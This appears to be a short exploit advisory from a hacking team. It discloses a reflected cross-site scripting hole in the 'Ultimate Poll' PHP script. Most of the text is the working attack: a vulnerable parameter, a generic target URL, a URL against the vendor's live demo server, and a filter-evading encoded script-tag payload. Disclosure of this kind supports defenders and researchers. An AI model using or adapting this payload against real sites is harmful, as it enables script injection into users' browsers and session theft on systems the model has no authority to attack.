========== [&#187;] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ========== [&#187;] Ultimate Poll Remote XSS vulnerability ========== [&#187;] Script: [ Ultimate Poll ] [&#187;] Language: [ PHP ] [&#187;] Download: [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1097156581 ] [&#187;] Founder: [ Moudi <m0udi@9.cn> ] [&#187;] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...] [&#187;] Team: [ EvilWay ] [&#187;] Dork: [ OFF ] [&#187;] Price: [ 6.00 US $ ] ############## ===[ Exploit XSS vulnerability ]=== [&#187;] http://www.site.com/patch/demo_page.php?action=vote&pid=test_poll&clr=[XSS] ===[ Exploit DEMO ONLINE ]=== [&#187;] http://demo.scriptsez.net:80/up/demo_page.php?action=vote&pid=test_poll&clr= XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(310294726286)%3B</ScRiPt> Author: Moudi ##############